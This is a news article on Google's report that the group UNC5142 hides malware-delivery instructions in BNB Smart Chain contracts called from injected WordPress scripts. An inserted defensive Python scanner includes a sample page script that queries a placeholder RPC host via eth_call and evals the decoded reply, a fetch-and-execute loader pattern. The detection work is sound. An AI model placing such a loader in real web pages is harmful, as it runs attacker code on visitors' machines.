Google Warns of Blockchain Exploitation in Massive Malware Campaign

The420 Correspondent

In a development that blurs the line between Web3 innovation and cyber exploitation, Google’s Threat Intelligence Group (GTIG) has revealed that a financially motivated hacking group, UNC5142, is abusing blockchain smart contracts to distribute malware.

The group leverages a technique known as EtherHiding, embedding malicious code directly on public blockchains such as the BNB Smart Chain, effectively using decentralized systems as a hosting network for malware.

Since mid-2024, the group has infected over 14,000 WordPress pages, injecting JavaScript that redirects visitors to compromised landing pages. These pages mimic browser update prompts but actually download information stealers — malware designed to extract credentials, financial data, and browser-stored information.


The Malware Chain: From WordPress to Wallets

At the heart of the campaign is a JavaScript downloader dubbed CLEARSHORT, a variant of the ClearFake malware framework. The infection chain begins when victims visit compromised WordPress sites containing malicious code injected into plugins, themes, or databases.

That first-stage code communicates with malicious smart contracts on the BNB Smart Chain, which fetch instructions for downloading secondary payloads — often hosted on Cloudflare .dev, GitHub, or MediaFire.

Once executed, the malware — including Atomic (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar — runs directly in memory to avoid antivirus detection. Both Windows and macOS users are targeted through fake system update prompts, tricking them into running terminal or PowerShell commands.
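The chain described above starts with a script injected into a WordPress page that reads its next stage from a smart contract. As an added illustration (not code from Google's report or from the article), the following Python scanner scores inline scripts on a page for the combination of traits that pattern implies: an EVM JSON-RPC read call, a contract address literal, runtime decoding, and dynamic code execution. The regexes, weights, threshold, and the sample page are assumptions constructed for this example, not indicators published for UNC5142, so a defender would tune them against their own site's legitimate scripts.

```python
import re
from dataclasses import dataclass

# Heuristic traits of a first-stage script that fetches instructions from an
# EVM-style chain. None of these is malicious alone; the scanner scores the
# combination. Patterns and weights are assumptions for this example.
RPC_METHOD_RE = re.compile(r"\beth_call\b|\beth_getStorageAt\b")      # JSON-RPC read of a contract
CONTRACT_ADDR_RE = re.compile(r"0x[0-9a-fA-F]{40}")                    # 20-byte address literal
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*=|\bimport\s*\(")
DECODE_RE = re.compile(r"\batob\s*\(|fromCharCode")                     # decoding fetched bytes at runtime
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    index: int        # position of the <script> element in the page
    score: int
    reasons: list


def score_script(body):
    """Return (score, reasons) for one inline script body."""
    score, reasons = 0, []
    if RPC_METHOD_RE.search(body):
        score += 3
        reasons.append("EVM JSON-RPC read call")
    if CONTRACT_ADDR_RE.search(body):
        score += 1
        reasons.append("contract address literal")
    if DYNAMIC_EXEC_RE.search(body):
        score += 2
        reasons.append("dynamic code execution")
    if DECODE_RE.search(body):
        score += 1
        reasons.append("runtime decoding of fetched data")
    return score, reasons


def scan_html(html, threshold=5):
    """Return Findings for every inline script whose score reaches the threshold."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        score, reasons = score_script(m.group(1))
        if score >= threshold:
            findings.append(Finding(i, score, reasons))
    return findings


# Constructed sample page: a benign analytics snippet followed by a script that
# asks a (placeholder) RPC endpoint to read a contract and executes the result.
# The RPC host and contract address are placeholders, not real indicators.
SAMPLE_HTML = (
    "<html><head>"
    "<script>window.dataLayer=window.dataLayer||[];"
    "function gtag(){dataLayer.push(arguments);}</script>"
    "</head><body><p>Welcome</p>"
    "<script>(async()=>{const r=await fetch('https://rpc.example.invalid',"
    "{method:'POST',body:JSON.stringify({jsonrpc:'2.0',id:1,method:'eth_call',"
    "params:[{to:'0x" + "ab" * 20 + "',data:'0x20965255'},'latest']})});"
    "const j=await r.json();eval(atob(j.result.slice(2)));})();</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"script #{f.index}: score {f.score}: {', '.join(f.reasons)}")
```

Run against a saved copy of a page, the scanner flags the second script and leaves the analytics snippet alone. Because the page article notes that the contract contents can be changed cheaply without touching the site, the durable signal on the web server side is the presence of chain-reading code in places it has no business being (themes, plugins, database-stored content), not any particular URL or key the contract currently returns.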

Blockchain as a Shield for Attackers

By embedding commands into smart contracts, UNC5142 exploits the immutable-yet-upgradable design of blockchain systems. Using what developers call the proxy pattern, the hackers maintain a three-contract architecture — separating router, logic, and storage — allowing them to update payload URLs or encryption keys without changing any website code.

Each update costs the hackers as little as $0.25 to $1.50 in blockchain network fees, granting them near-unlimited flexibility. The result is an agile and resilient infrastructure — difficult for law enforcement or cybersecurity vendors to dismantle.

A Sign of What’s Coming

The use of blockchain for malware delivery marks a pivotal shift in cybercrime strategy. Decentralized technology — long touted for transparency and security — is now being repurposed as a weapon for obfuscation.

Google’s researchers have not observed new UNC5142 campaigns since July 2025, suggesting a temporary lull or operational shift. But experts warn the model could inspire copycat attacks, fusing the anonymity of crypto ecosystems with the scalability of automated malware delivery.

“Once hackers start leveraging immutable public ledgers for infection control,” one researcher noted, “traditional takedown models simply don’t work anymore.”
